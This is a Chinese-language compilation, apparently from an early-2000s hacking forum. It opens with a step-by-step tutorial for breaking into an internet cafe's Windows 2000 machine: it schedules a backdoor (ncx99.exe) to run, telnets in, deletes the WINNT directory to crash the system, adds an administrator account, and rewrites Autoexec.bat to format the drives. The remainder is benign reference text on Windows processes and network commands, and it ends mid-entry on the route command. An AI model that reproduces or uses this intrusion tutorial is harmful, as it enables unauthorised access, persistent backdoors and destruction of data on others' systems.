接着把NETX99放上去!
看他的时间!
net time //61.141.xxx.xxx
他的时间是假如是下午3:02分
接着安排他的执行时间!
at //61.141.xxx.xxx 15:04 ncx99.exe
命令成功完成!
接下来就是等时间了! OK!到时间了!
telnet 61.141.xxx.xxx 99
进入了! c:/>rd /s /q WINNT
呵呵! 这时你会发现有很多文件拒绝访问!
要害怕!
这是很正常的事情!
因为他有很多文件正在调用! 不过他的机器很快就会拼命报错!
直到系统崩溃! 对于一个网吧来说!
这个无疑是一个致命的打击!
没有主机怎么上网? 只有关门了! 接着就是如何获取ADMIN的权限了!
我们首先把他的C盘映射成为我们的Z盘! 开始--运行--cmd
输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名" 出现:命令成功完成
这时候你打开“我的电脑”看看! 是不是多了一个Z盘?
接着不用我多说了吧? 首先必须创建一个你自己的用户名 输入:net user 用户名 "密码" /add
出现:命令成功完成 OK!
接着就是如何把你创建的用户加到ADMIN组了! 输入:net localgroup "administrators" 用户名 /add
出现:命令成功完成 我们把他的WINNT目录删除掉!
回到对方的MS-DOS下! 输入:rd /s /q WINNT
这时你会发现有很多文件拒绝访问! 不要害怕! 这是很正常的事情!
因为他有很多文件正在调用!不过他的机器很快就会拼命报错!
直到系统崩溃! 够好玩的了吧? 如果对方是WIN98的话你可以把他C盘根目录下的Autoexec.bat文件改一下!
打开他的Autoexec.bat文件! 把原来的全删掉! 输入:
@echo off
format d: /q /u
delete d:
format c: /q /u
delete c:
保存!
系统进程全攻略
最基本的系统进程(也就是说,这些进程是系统运行的基本条件,有了这些进程,系统就能正常运行):
smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务)
产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标
附加的系统进程(这些进程不是必要的,你可以根据需要通过服务管理器来增加或减少):
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000 Professional 桌面会话以及运行在服务器上的基
于 Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)
以下服务很少会用到,上面的服务都对安全有害,如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)
支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序
。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)
详细说明:
win2k运行进程
Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%/system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。
Svchost.exe 组是用下面的注册表值来识别。
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Svchost
每个在这个键下的值代表一个独立的Svchost组,并且当你正在看活动的进程时,它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名,这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Service
更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始-运行-敲入cmd
然后在敲入 tlist -s (tlist 应该是win2k工具箱里的冬冬)
Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息,可以敲 tlist pid。
Tlist 显示Svchost.exe运行的两个例子。
0 System Process
8 System
132 smss.exe
160 csrss.exe title:
180 winlogon.exe title: NetDDE Agent
208services.exe
Svcs: AppMgmt,Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,LanmanWorkstation,LmHosts,Messenger,PlugPlay,ProtectedStorage,seclogon,TrkWks,W32Time,Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe title: OleMainThreadWndName
812 explorer.exe title: Program Manager
1032 OSA.EXE title: Reminder
1300 cmd.exe title: D:/WINNT5/System32/cmd.exe - tlist -s
1080 MAPISP32.EXE title: WMS Idle
1264 rundll32.exe title:
1000 mmc.exe title: Device Manager
1144 tlist.exe
在这个例子中注册表设置了两个组。
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows NT/CurrentVersion/Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs
smss.exe
csrss.exe
这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows,创建或者删除线程和一些16位的虚拟MS-DOS环境。
explorer.exe
这是一个用户的shell(我实在是不知道怎么翻译shell),在我们看起来就像任务条,桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中,你可以从任务管理器中停掉它,或者重新启动。
通常不会对系统产生什么负面影响。
internat.exe
这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS/.DEFAULT/Keyboard Layout/Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区,允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候,图标就会消失,但是输入点仍然可以通过控制面板来改变。
lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入
令牌,令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。
mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务,负责用户事先决定在某一时间运行的任务的运行。
smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,
包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些
进程后,它等待Winlogon或者Csrss结束。如果这些过程时正常的,系统就关掉了。如果发生了什么
不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。
spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲(spooler)服务是管理缓冲池中的打印和传真作业。
service.exe
这个进程是不可以从任务管理器中关掉的。
大多数的系统核心模式进程是作为系统进程在运行。
System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上,并在系统不处理其他线程的时候分派处理器的时间。
winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了,显示安全对话框。
winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化
taskmagr.exe
这个进程呀,哈哈,就是任务管理器了。
网络经典命令行
网络经典命令行 -> Windows 2k/2003 Server
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:/>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:/>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: //192.168.10.8/movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:/>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
//192.168.10.110 ROME Windows 2000 2195 0 00:03:12
//192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:/net share mymovie=e:/downloads/movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr] [-g [InetAddr] [-N IfaceAddr] [-d InetAddr [IfaceAddr] [-s InetAddr EtherAddr [IfaceAddr]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
Rsh
在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。
语法
rsh [Host] [-l UserName] [-n] [Command]
参数
Host
指定运行 command 的远程计算机。
-l UserName
指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。
-n
将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。
Command
指定要运行的命令。
/?
在命令提示符显示帮助。
注释
标准操作
rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件“RemoteFile”附加到本地文件“LocalFile”中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
Tftp
向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。
语法
tftp [-i] [Host] [{get | put}] [Source] [Destination]
参数
-i
指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。
Host
指定本地或远程计算机。
put
将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。
get
将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。
Source
指定要传送的文件。
Destination
指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。
/?
在命令提示符显示帮助。
注释
使用 get 参数
如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。
Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入:
tftp vax1 put users.txt users19.txt
Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。
语法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
参数
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
-c
显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。
-n
显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。
-r
显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。
-R
清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。
-RR
重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。
-s
显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。
-S
显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。
Interval
重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数, netstat 将只显示一次当前的配置信息。
/?
在命令提示符显示帮助。
注释
Nbtstat 命令行参数区分大小写。
下表列出了由 Nbtstat 生成的列标题。 标题 说明
Input 接收的字节数。
Output 发送的字节数。
In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。
Lift 名称表缓存项在被清除之前所存留的时间。
Local Name 本地 NetBIOS 名称与连接相关联。
Remote Host 与远程计算机相关的名称或 IP 地址。
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type 名称类型。名称可以是单个名称,也可以是组名称。
Status 远程计算机上是否在运行 NetBIOS 服务(“已注册”),或同一计算机名是否已注册了相同的服务(“冲突”)。
State NetBIOS 连接的状态。
下表列出了可能的 NetBIOS 连接状态。 状态 说明
已连接 会话已建立。
关联 连接的终结点已经被创建并与 IP 地址关联。
正接听 该终结点对内向连接可用。
空闲 该结束点已被打开单不能接收连接。
正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。
接受 入站会话当前正在被接受,将在短期内连接。
重新连接 会话将试图重新连接(如果第一次连接失败)。
出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。
入站 入站会话在连接期。
正在断开 会话正在断开连接。
已中断连接 本地计算机已断开连接,并正等待远程系统的确认。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -a CORP07
要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -A 10.0.0.99
要显示本地计算机的 NetBIOS 名称表,请键入:
nbtstat -n
要显示本地计算机 NetBIOS 名称缓存的内容,请键入:
nbtstat -c
要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入:
nbtstat -R
要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入:
nbtstat -RR
要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入:
nbtstat -S 5
Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
语法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
参数
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
-e
显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。
-n
显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。
-o
显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的“进程”选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。
-p Protocol
显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。
-r
显示 IP 路由表的内容。该参数与 route print 命令等价。
Interval
每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。
/?
在命令提示符显示帮助。
注释
与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。
Netstat 提供下列统计信息:
Proto
协议的名称(TCP 或 UDP)。
Local Address
本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。
Foreign Address
连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。
(state)
表明 TCP 连接的状态。可能的状态如下:
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
有关 TCP 连接状态的信息,请参阅 RFC 793。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要想显示以太网统计信息和所有协议的统计信息,请键入下列命令:
netstat -e -s
要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令:
netstat -s -p tcp udp
要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -o 5
要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -n -o
Runas
允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。
语法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program
参数
/profile
加载用户的配置文件。/profile 是默认值。
/no profile
/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。
/env
指定当前使用的网络环境,而不是用户的本地环境。
/netonly
指明指定的用户信息只用于远程访问。
/smartcard
/smartcard 表示凭据是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 开关项。
/trustlevel
指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。
/user:UserAccountName
指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain/user。
程序
指定要用在 /user 中指定的帐户运行的程序或命令。
/?
在命令提示符显示帮助。
注释
管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。
有关 runas 命令的使用范例,请参阅“相关主题”。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或“控制面板”项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName/AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/user:DomainName/AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组(例如“Users”或“Power Users”组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如“打印机”文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在“计算机管理”中单击“服务和应用程序”,然后单击“服务”。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename/administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain/domainadmin 的域管理员帐户启动“计算机管理”管理单元实例,请键入:
runas /user:companydomain/domainadmin "mmc %windir%/system32/compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动“记事本”实例,请键入:
runas /user:[email protected] "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain/username "command"
domain/username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
Route
在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric] [if Interface]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
